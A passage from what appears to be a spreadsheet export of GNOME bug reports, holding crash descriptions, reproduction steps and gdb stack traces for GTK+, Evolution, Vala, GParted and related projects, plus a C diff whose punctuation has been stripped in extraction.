+my_timegm (struct tm *tm)
+{
+    time_t ret
+    char *tz
+
+    tz = getenv(TZ)
+    setenv(TZ  1)
+    tzset()
+    ret = mktime(tm)
+    if (tz)
+        setenv(TZ tz 1)
+    else
+        unsetenv(TZ)
+    tzset()
+    return ret
+}
+
 /* The format is: 20021209T23:51:30 and is in UTC. 0 is returned on
  * failure. The alternative format 20021209 is also accepted.
  */
@@ -567 +767 @@
     tm.tm_mon = month - 1
     tm.tm_isdst = -1
-    return timegm (
+    return my_timegm (
 }</t>
  </si>
  <si>
    <t>mr</t>
  </si>
  <si>
    <t>GTK+-322998</t>
  </si>
  <si>
    <t>Crash on selecting a file of null mime-type</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Open an `Open file' dialog
2. Press Ctrl+l to popup the location-dialog
3. Give a valid filename (in my case it was /tmp/gaimTeX.png)
4. Hit enter
5. Watch the application crash
Stack trace:
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb78149b1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb78162c9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0x080ee8df in sighandler (sig=0) at gtkmain.c:191
#4  
#5  0xb7855a63 in strchr () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7f14cf8 in get_icon_for_mime_type (widget=0x84514e0 mime_type=0x0
pixel_size=16) at gtkfilesystemunix.c:1287
#7  0xb7f14eeb in gtk_file_system_unix_render_icon (file_system=0x0
path=0x846f9c0 widget=0x84514e0 pixel_size=16
    error=0x0) at gtkfilesystemunix.c:1328
#8  0xb7d980c8 in IA__gtk_file_system_render_icon (file_system=0x84525b8
path=0x846f9c0 widget=0x84514e0 pixel_size=16
    error=0x2f2f2f2f) at gtkfilesystem.c:698
#9  0xb7d8cce6 in list_icon_data_func (tree_column=0x8318b38 cell=0x0
tree_model=0x84791c0 iter=0x846f9c0
    data=0x84514e0) at gtkfilechooserdefault.c:6938
#10 0xb7eebcc5 in IA__gtk_tree_view_column_cell_set_cell_data
(tree_column=0x8318b38 tree_model=0x84791c0
    iter=0xbfffd100 is_expander=0 is_expanded=0) at gtktreeviewcolumn.c:2548
#11 0xb7ed6fcd in validate_row (tree_view=0x83f6e18 tree=0x845d7a8
node=0x84841a0 iter=0xbfffd100 path=0x0)
    at gtktreeview.c:4656
#12 0xb7ed811b in do_validate_rows (tree_view=0x83f6e18 queue_resize=0) at
gtktreeview.c:5216
#13 0xb7ed0eba in gtk_tree_view_size_request (widget=0x83f6e18
requisition=0x83f6e34) at gtktreeview.c:1798
#14 0xb7a0ca16 in IA__g_cclosure_marshal_VOID__BOXED (closure=0x813aa88
return_value=0x0 n_param_values=2
    param_values=0xbfffd3f0 invocation_hint=0xbfffd2d8
marshal_data=0xb7ed0e50) at gmarshal.c:566
#15 0xb79f8969 in g_type_class_meta_marshal (closure=0x813aa88
return_value=0x0 n_param_values=0
    param_values=0xbfffd3f0 invocation_hint=0x0 marshal_data=0x0) at
gclosure.c:567
#16 0xb79f8695 in IA__g_closure_invoke (closure=0x813aa88 return_value=0x0
n_param_values=0 param_values=0x0
    invocation_hint=0x0) at gclosure.c:490
#17 0xb7a0b2f1 in signal_emit_unlocked_R (node=0x81b13f8 detail=0
instance=0x83f6e18 emission_return=0x0
    instance_and_params=0xbfffd3f0) at gsignal.c:2379
#18 0xb7a0aafc in IA__g_signal_emit_valist (instance=0x83f6e18 signal_id=0
detail=0
    var_args=0xbfffd58c
tA\uffff\uffff\030n?\bX\uffff\uffff\uffff\uffff\uffff\uffff\uffffhb\uffff\uffff\030n?\b\001)
at gsignal.c:2208
#19 0xb7a0ae86 in IA__g_signal_emit_by_name (instance=0x83f6e18
detailed_signal=0xb7f9d461 size_request)
    at gsignal.c:2276
#20 0xb7e45e3e in do_size_request (widget=0x83f6e18) at gtksizegroup.c:592
#21 0xb7e46268 in _gtk_size_group_compute_requisition (widget=0x83f6e18
requisition=0xbfffd658) at gtksizegroup.c:788
#22 0xb7efe126 in IA__gtk_widget_size_request (widget=0x83f6e18
requisition=0xbfffd658) at gtkwidget.c:2693
#23 0xb7ed75b4 in validate_visible_area (tree_view=0x83f6e18) at gtktreeview.c:5066
#24 0xb7ed85d3 in do_presize_handler (tree_view=0x83f6e18) at gtktreeview.c:5309
#25 0xb7ed86dc in presize_handler_callback (data=0x0) at gtktreeview.c:5333
#26 0xb798a653 in g_idle_dispatch (source=0x8487f00 callback=0x2f2f2f2f
user_data=0x0) at gmain.c:3761
#27 0xb79876b2 in g_main_dispatch (context=0x8168d20) at gmain.c:1913
#28 0xb7988728 in IA__g_main_context_dispatch (context=0x8168d20) at gmain.c:2463
#29 0xb7988a60 in g_main_context_iterate (context=0x8168d20 block=1
dispatch=1 self=0x816b290) at gmain.c:2544
Other information:
I am using gtk+2.9.0 from cvs. I am running ion3 but I don't think that is an
issue here.</t>
  </si>
  <si>
    <t>imadil</t>
  </si>
  <si>
    <t>GTK-DOC-523669</t>
  </si>
  <si>
    <t>make check: Element publisher content does not follow the DTD expecting (publishername  address*) got (address)</t>
  </si>
  <si>
    <t>While doing a make check I got this error:
xmllint --noout --noent --path C:./C --xinclude --postvalid ./C/gtk-doc-manual.xml
./C/gtk-doc-manual.xml:44: element publisher: validity error : Element publisher content does not follow the DTD expecting (publishername  address*) got (address)
Document ./C/gtk-doc-manual.xml does not validate
V4.1.2 seems to be quite outdated. I can't find a simple page to tell me what 4.12 expect.
Should it be updated to 4.5 for example?</t>
  </si>
  <si>
    <t>GNOME-CORE-38799</t>
  </si>
  <si>
    <t>Gnomeicu starting by a crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.1
Synopsis: Gnomeicu starting by a crash
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
simply try to compile gnomeicu on a RedHat 7.0 and you'll
understand...
crashes...
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x4060c5a9 in __wait4 () from /lib/libc.so.6
#0  0x4060c5a9 in __wait4 () from /lib/libc.so.6
#1  0x40676824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4016cb38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x40065b31 in ORBit_marshal_object () from /usr/lib/libORBit.so.0
#5  0x400aa58c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#6  0x40065c11 in _ORBit_object_get_connection () from /usr/lib/libORBit.so.0
#7  0x4002be7b in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
#8  0x8077c36 in load_queued_externs ()
#9  0x4002d543 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#10 0x40063dd7 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#11 0x400661a7 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#12 0x400663e9 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#13 0x400844c9 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#14 0x400f77f9 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#15 0x4009f1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#16 0x400a0987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#17 0x400a1001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#18 0x400a11cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#19 0x402b6e57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#20 0x8055aa0 in main ()
#21 0x40572b65 in __libc_start_main (main=0x8055790  argc=3 
    ubp_av=0xbffffb54 init=0x8052f24  fini=0x8090f9c  
    rtld_fini=0x4000df24  stack_end=0xbffffb4c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x4060c5a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40676824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4016cb38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x40065b31 in ORBit_marshal_object () from /usr/lib/libORBit.so.0
No symbol table info available.
#5  0x400aa58c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x40065c11 in _ORBit_object_get_connection () from /usr/lib/libORBit.so.0
No symbol table info available.
#7  0x4002be7b in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:20 -------
This bug was previously known as bug 38799 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=38799
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (chelmi@evhr.net) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>chelmi</t>
  </si>
  <si>
    <t>VALA-467896</t>
  </si>
  <si>
    <t>switch block frees too many variables</t>
  </si>
  <si>
    <t>Switch statements in vala release local variables declared outside of the switch block. Consider the following program:
using GLib
class SwitchTest {
    static void main () {
        var foo = Hello World
        var bar = 0
        stdout.printf (foo before switch: %s\n foo)
        switch (bar) {
            case 0:
                stdout.printf (foo in switch: %s\n foo)
                break
        }
        stdout.printf (foo after switch: %s\n foo)
    }
}
Expected Result:
foo before switch: Hello World
foo in switch: Hello World
foo after switch: Hello World
Actual Result:
foo before switch: Hello World
foo in switch: Hello World
foo after switch: (null)
Additional Information:
The problem can be worked arround by enclosing the switch statement in a do { ... } while (false) block.</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-103303</t>
  </si>
  <si>
    <t>console window hangs each time it is launched</t>
  </si>
  <si>
    <t xml:space="preserve">Bugzilla-Product: gnome-terminal
Description:
  Please see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=80333
  for the original bug report.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-12 21:16 -------
Reassigning to the default owner of the component hp@redhat.com.
</t>
  </si>
  <si>
    <t>EVOLUTION-200476</t>
  </si>
  <si>
    <t>Use multiple identities and mail sources</t>
  </si>
  <si>
    <t>Need to have mail fetching fetch from multiple sources and allow email to be
composed with multiple senders.</t>
  </si>
  <si>
    <t>EVOLUTION-244723</t>
  </si>
  <si>
    <t>Calendar - Alarm Notify - Displays _originally entered_ summary</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 1.4.0
Synopsis: Calendar - Alarm Notify - Displays _originally entered_ summary
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Description of Problem:
Whenever I enter an appointment and later change the summary this
change is _not_ displayed in the notify window!!! The notify windows
always displays the summary I've originally etnered. (I use the option
that to each appointment I enter a notification is added
automatically.)
This problem exists since Evolution 1.2.x. I don't know when it came up
and if it probably is there since the beginning of Evolution.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GPARTED-336356</t>
  </si>
  <si>
    <t>Cut/paste/cut/paste loses data</t>
  </si>
  <si>
    <t>Please describe the problem:
I was using gparted to repartition a drive the other day.  I cut two partitions
and pasted them in different places.  The first transaction went fine but the
second transaction complained because parted had reread the new partition
numbers and couldn't find the partition for the second pair of operations. 
Actually it just did the cut.  Not so good...
I haven't tried this with gparted 0.2.3 or anything recent.  The version I was
using was on ubuntu breezy.
Steps to reproduce:
1. cut partition /dev/hda5
2. paste it at end
3. cut partition /dev/hda6
4. paste it at end
Actual results:
/dev/hda6 goes away
Expected results:
/dev/hda6 should be reproduced at end of disk
Does this happen every time?
I only tried it once...
Other information:</t>
  </si>
  <si>
    <t>p.lam</t>
  </si>
  <si>
    <t>EVOLUTION-215470</t>
  </si>
  <si>
    <t>filter criterion crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.1
Synopsis: filter criterion crash
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
Open Tools--&gt;filters
ADD filter
Just looking at the different types of filter options.
Selected 'source account' first
then selected 'Regex Match'
crash happened here.
Debugging Information:
[New Thread 1024 (LWP 23885)]
[New Thread 2049 (LWP 23914)]
[New Thread 1026 (LWP 23915)]
[New Thread 4099 (LWP 23920)]
[New Thread 3076 (LWP 23917)]
[New Thread 6149 (LWP 23942)]
[New Thread 7174 (LWP 2735)]
0x40b2ec09 in __wait4 () from /lib/libc.so.6
#0  0x40b2ec09 in __wait4 () from /lib/libc.so.6
#1  0x40baafd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406db8de in waitpid (pid=13389 stat_loc=0xbfffe69c options=0)
    at wrapsyscall.c:172
#3  0x40309262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809d34a in segv_redirect (sig=11) at main.c:69
#5  0x406d94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 135162898 esi = 1097892566 ebp = 3221220032 esp = 3221219944 ebx = 135186864 edx = 1097892736 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 135037150 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221219944 ss = 43 __ssh = 0 fpstate = 0xbfffe7e8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x080c80de in validate (fe=0x41708380) at filter-input.c:184
#8  0x080cf7e5 in filter_element_validate (fe=0x41708380)
    at filter-element.c:135
#9  0x080c8f2e in filter_part_validate (fp=0x414e95b8) at filter-part.c:147
#10 0x080caf52 in more_parts (button=0x414d0808 data=0x417090f8)
    at filter-rule.c:659
#11 0x404b2fe7 in gtk_marshal_NONE__NONE (object=0x414d0808 
    func=0x80caf20  func_data=0x417090f8 args=0xbfffec28)
    at gtkmarshal.c:312
#12 0x404e2706 in gtk_handlers_run (handlers=0x4155fa20 signal=0xbfffebc8 
    object=0x414d0808 params=0xbfffec28 after=0) at gtksignal.c:1917
#13 0x404e1b57 in gtk_signal_real_emit (object=0x414d0808 signal_id=198 
    params=0xbfffec28) at gtksignal.c:1477
#14 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=198)
    at gtksignal.c:552
#15 0x4045058c in gtk_button_clicked (button=0x414d0808) at gtkbutton.c:336
#16 0x40451b02 in gtk_real_button_released (button=0x414d0808)
    at gtkbutton.c:861
#17 0x404b2fe7 in gtk_marshal_NONE__NONE (object=0x414d0808 
    func=0x40451a5c  func_data=0x0 args=0xbfffefb8)
    at gtkmarshal.c:312
#18 0x404e1a03 in gtk_signal_real_emit (object=0x414d0808 signal_id=197 
    params=0xbfffefb8) at gtksignal.c:1440
#19 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=197)
    at gtksignal.c:552
#20 0x404504d0 in gtk_button_released (button=0x414d0808) at gtkbutton.c:327
#21 0x40451477 in gtk_button_button_release (widget=0x414d0808 
    event=0x40f80964) at gtkbutton.c:721
#22 0x404b2dbd in gtk_marshal_BOOL__POINTER (object=0x414d0808 
    func=0x404513b4  func_data=0x0 
    args=0xbffff358) at gtkmarshal.c:28
#23 0x404e1b97 in gtk_signal_real_emit (object=0x414d0808 signal_id=27 
    params=0xbffff358) at gtksignal.c:1492
#24 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=27)
    at gtksignal.c:552
#25 0x40517084 in gtk_widget_event (widget=0x414d0808 event=0x40f80964)
    at gtkwidget.c:2864
#26 0x404b2d34 in gtk_propagate_event (widget=0x414d0808 event=0x40f80964)
    at gtkmain.c:1378
#27 0x404b1ef1 in gtk_main_do_event (event=0x40f80964) at gtkmain.c:818
#28 0x4056c16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff728 user_data=0x0) at gdkevents.c:2139
#29 0x4059c055 in g_main_dispatch (dispatch_time=0xbffff728) at gmain.c:656
#30 0x4059c659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#31 0x4059c7e8 in g_main_run (loop=0x81368d0) at gmain.c:935
#32 0x404b17f7 in gtk_main () at gtkmain.c:524
#33 0x408e165f in bonobo_main () at bonobo-main.c:283
#34 0x0809d505 in main (argc=3 argv=0xbffff94c) at main.c:145
#35 0x40a97306 in __libc_start_main (main=0x809d374  argc=3 
    ubp_av=0xbffff94c init=0x8065efc  fini=0x80d329c  
    rtld_fini=0x4000d2cc  stack_end=0xbffff944)
    at ../sysdeps/generic/libc-start.c:129
Thread 7 (Thread 7174 (LWP 2735)):
#0  0x40aa9966 in __sigsuspend (set=0xbefff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406d8d61 in __pthread_wait_for_restart_signal (self=0xbefffc00)
    at pthread.c:969
#2  0x406d4ee4 in pthread_cond_wait (cond=0x81343e8 mutex=0x8134508)
    at restart.h:34
#3  0x40082888 in e_msgport_wait (mp=0x81344e0) at e-msgport.c:198
#4  0x40082eca in thread_dispatch (din=0x8134490) at e-msgport.c:517
#5  0x406d5f87 in pthread_start_thread (arg=0xbefffc00) at manager.c:284
Thread 6 (Thread 6149 (LWP 23942)):
#0  0x40aa9966 in __sigsuspend (set=0xbf1ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406d8d61 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:969
#2  0x406d4ee4 in pthread_cond_wait (cond=0x40d496c8 mutex=0x40d587b8)
    at restart.h:34
#3  0x40082888 in e_msgport_wait (mp=0x40d48d08) at e-msgport.c:198
#4  0x40082eca in thread_dispatch (din=0x40d58768) at e-msgport.c:517
#5  0x406d5f87 in pthread_start_thread (arg=0xbf1ffc00) at manager.c:284
Thread 5 (Thread 3076 (LWP 23917)):
#0  0x40aa9966 in __sigsuspend (set=0xbf3ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406d8d61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x406d4ee4 in pthread_cond_wait (cond=0x81347d0 mutex=0x8134470)
    at restart.h:34
#3  0x40082888 in e_msgport_wait (mp=0x81343c0) at e-msgport.c:198
#4  0x40082eca in thread_dispatch (din=0x8134780) at e-msgport.c:517
#5  0x406d5f87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 4099 (LWP 23920)):
#0  0x40aa9966 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406d8d61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x406d4ee4 in pthread_cond_wait (cond=0x81343e8 mutex=0x8134508)
    at restart.h:34
#3  0x40082888 in e_msgport_wait (mp=0x81344e0) at e-msgport.c:198
#4  0x40082eca in thread_dispatch (din=0x8134490) at e-msgport.c:517
#5  0x406d5f87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 23915)):
#0  0x40aa9966 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406d8d61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x406d4ee4 in pthread_cond_wait (cond=0x8134770 mutex=0x8134750)
    at restart.h:34
#3  0x40082888 in e_msgport_wait (mp=0x8134728) at e-msgport.c:198
#4  0x40082eca in thread_dispatch (din=0x81346d8) at e-msgport.c:517
#5  0x406d5f87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 23914)):
#0  0x40b59bec in __poll (fds=0x814f4cc nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406d5d0e in __pthread_manager (arg=0x18) at manager.c:140
Thread 1 (Thread 1024 (LWP 23885)):
#0  0x40b2ec09 in __wait4 () from /lib/libc.so.6
#1  0x40baafd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406db8de in waitpid (pid=13389 stat_loc=0xbfffe69c options=0)
    at wrapsyscall.c:172
#3  0x40309262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809d34a in segv_redirect (sig=11) at main.c:69
#5  0x406d94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 135162898 esi = 1097892566 ebp = 3221220032 esp = 3221219944 ebx = 135186864 edx = 1097892736 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 135037150 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221219944 ss = 43 __ssh = 0 fpstate = 0xbfffe7e8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x080c80de in validate (fe=0x41708380) at filter-input.c:184
#8  0x080cf7e5 in filter_element_validate (fe=0x41708380)
    at filter-element.c:135
#9  0x080c8f2e in filter_part_validate (fp=0x414e95b8) at filter-part.c:147
#10 0x080caf52 in more_parts (button=0x414d0808 data=0x417090f8)
    at filter-rule.c:659
#11 0x404b2fe7 in gtk_marshal_NONE__NONE (object=0x414d0808 
    func=0x80caf20  func_data=0x417090f8 args=0xbfffec28)
    at gtkmarshal.c:312
#12 0x404e2706 in gtk_handlers_run (handlers=0x4155fa20 signal=0xbfffebc8 
    object=0x414d0808 params=0xbfffec28 after=0) at gtksignal.c:1917
#13 0x404e1b57 in gtk_signal_real_emit (object=0x414d0808 signal_id=198 
    params=0xbfffec28) at gtksignal.c:1477
#14 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=198)
    at gtksignal.c:552
#15 0x4045058c in gtk_button_clicked (button=0x414d0808) at gtkbutton.c:336
#16 0x40451b02 in gtk_real_button_released (button=0x414d0808)
    at gtkbutton.c:861
#17 0x404b2fe7 in gtk_marshal_NONE__NONE (object=0x414d0808 
    func=0x40451a5c  func_data=0x0 args=0xbfffefb8)
    at gtkmarshal.c:312
#18 0x404e1a03 in gtk_signal_real_emit (object=0x414d0808 signal_id=197 
    params=0xbfffefb8) at gtksignal.c:1440
#19 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=197)
    at gtksignal.c:552
#20 0x404504d0 in gtk_button_released (button=0x414d0808) at gtkbutton.c:327
#21 0x40451477 in gtk_button_button_release (widget=0x414d0808 
    event=0x40f80964) at gtkbutton.c:721
#22 0x404b2dbd in gtk_marshal_BOOL__POINTER (object=0x414d0808 
    func=0x404513b4  func_data=0x0 
    args=0xbffff358) at gtkmarshal.c:28
#23 0x404e1b97 in gtk_signal_real_emit (object=0x414d0808 signal_id=27 
    params=0xbffff358) at gtksignal.c:1492
#24 0x404dfbcc in gtk_signal_emit (object=0x414d0808 signal_id=27)
    at gtksignal.c:552
#25 0x40517084 in gtk_widget_event (widget=0x414d0808 event=0x40f80964)
    at gtkwidget.c:2864
#26 0x404b2d34 in gtk_propagate_event (widget=0x414d0808 event=0x40f80964)
    at gtkmain.c:1378
#27 0x404b1ef1 in gtk_main_do_event (event=0x40f80964) at gtkmain.c:818
#28 0x4056c16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff728 user_data=0x0) at gdkevents.c:2139
#29 0x4059c055 in g_main_dispatch (dispatch_time=0xbffff728) at gmain.c:656
#30 0x4059c659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#31 0x4059c7e8 in g_main_run (loop=0x81368d0) at gmain.c:935
#32 0x404b17f7 in gtk_main () at gtkmain.c:524
#33 0x408e165f in bonobo_main () at bonobo-main.c:283
#34 0x0809d505 in main (argc=3 argv=0xbffff94c) at main.c:145
#35 0x40a97306 in __libc_start_main (main=0x809d374  argc=3 
    ubp_av=0xbffff94c init=0x8065efc  fini=0x80d329c  
    rtld_fini=0x4000d2cc  stack_end=0xbffff944)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b2ec09 in __wait4 () from /lib/libc.so.6
#0  0x40b2ec09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40baafd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x406db8de in waitpid (pid=13389 stat_loc=0xbfffe69c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe69c
options = 0
result = 0
oldtype = 0
#3  0x40309262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 136094008
in_segv = 1
pid = 0
#4  0x0809d34a in segv_redirect (sig=11) at main.c:69
	in main.c
sig = 11
#5  0x406d94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 135162898 esi = 1097892566 ebp = 3221220032 esp = 3221219944 ebx = 135186864 edx = 1097892736 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 135037150 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221219944 ss = 43 __ssh = 0 fpstate = 0xbfffe7e8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
self = 0x406e2460
in_sighandler = 0x0
self = 0x406e2460
in_sighandler = 0x0
#6  
No locals.
#7  0x080c80de in validate (fe=0x41708380) at filter-input.c:184
	in filter-input.c
fi = (FilterInput *) 0x41708380
valid = 1
regexpat = {buffer = 0xbfffeab8 \230ypAÃ¬ypAÃ ÃªÃ¿Â¿Ã¥Ã·\f\b\200\203pAnÃ‰ 
  allocated = 1097900096 used = 1079565140 syntax = 1077983648 
  fastmap = 0x90012  
  translate = 0x40015858 ÃœY\001 re_nsub = 1073831672 can_be_null = 0 
  regs_allocated = 0 fastmap_accurate = 0 no_sub = 0 not_bol = 0 
  not_eol = 0 newline_anchor = 0}
regerr = 135162898
text = 0x8055ff1 g_list_last
</t>
  </si>
  <si>
    <t>GEDIT-374706</t>
  </si>
  <si>
    <t>Replace accelerator with shortcut key</t>
  </si>
  <si>
    <t>2006-11-12  Jesse van den Kieboom  
	* plugins/snippets/snippets/SnippetsDialog.py:
	* plugins/snippets/snippets/snippets.glade:
	Replace accelerator with shortcut (key) fixes #352244</t>
  </si>
  <si>
    <t>GNOME-CORE-31371</t>
  </si>
  <si>
    <t>gnome crashed after the login</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.0
Synopsis: gnome crashed after the login
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0smp i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.0
libxml: 1.8.7
gnome-print: gnome-print-0.20-0_helix_1
gnome-core: gnome-core 1.2.0
Description:
I didn't even got a desktop the sreen blanked (default bg color) and
the crash dialog popped up.
Debugging information:
0x405278e9 in __wait4 () from /lib/libc.so.6
#0  0x405278e9 in __wait4 () from /lib/libc.so.6
#1  0x405861ec in ?? () from /lib/libc.so.6
#2  0x40084111 in gnome_segv_handle (signum=11) at gnome-init.c:655
#3  0x404b4c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x403bd16d in g_free (mem=0x6279656b) at gmem.c:411
#5  0x80537ae in free_list (list=0x80e3768 udata=0x0) at splash.c:62
#6  0x403c52a9 in g_slist_foreach (list=0x805d418 func=0x80537a0  
    user_data=0x0) at gslist.c:493
#7  0x80537f4 in splash_cleanup (o=0x80c9040 data=0x0) at splash.c:70
#8  0x401c805d in gtk_marshal_NONE__NONE (object=0x80c9040 
    func=0x80537c0  func_data=0x0 args=0xbffff2e0)
    at gtkmarshal.c:312
#9  0x401f579d in gtk_handlers_run (handlers=0x8068060 signal=0xbffff29c 
    object=0x80c9040 params=0xbffff2e0 after=0) at gtksignal.c:1909
#10 0x401f4be2 in gtk_signal_real_emit (object=0x80c9040 signal_id=1 
    params=0xbffff2e0) at gtksignal.c:1469
#11 0x401f2d35 in gtk_signal_emit (object=0x80c9040 signal_id=1)
    at gtksignal.c:552
#12 0x401d8983 in gtk_object_shutdown (object=0x80c9040) at gtkobject.c:255
#13 0x4022bb30 in gtk_widget_shutdown (object=0x80c9040) at gtkwidget.c:4386
#14 0x4022e3c3 in gtk_window_shutdown (object=0x80c9040) at gtkwindow.c:656
#15 0x401d892b in gtk_object_destroy (object=0x80c9040) at gtkobject.c:246
#16 0x40224b26 in gtk_widget_destroy (widget=0x80c9040) at gtkwidget.c:1388
#17 0x805373c in destroy_dialog (w=0x80c9040 event=0x80d9688 data=0x80c9040)
    at splash.c:47
#18 0x401c7c29 in gtk_marshal_BOOL__POINTER (object=0x80c9040 
    func=0x8053730  func_data=0x80c9040 args=0xbffff6a0)
    at gtkmarshal.c:28
#19 0x401f579d in gtk_handlers_run (handlers=0x8068080 signal=0xbffff65c 
    object=0x80c9040 params=0xbffff6a0 after=0) at gtksignal.c:1909
#20 0x401f4be2 in gtk_signal_real_emit (object=0x80c9040 signal_id=27 
    params=0xbffff6a0) at gtksignal.c:1469
#21 0x401f2d35 in gtk_signal_emit (object=0x80c9040 signal_id=27)
    at gtksignal.c:552
#22 0x402280fc in gtk_widget_event (widget=0x80c9040 event=0x80d9688)
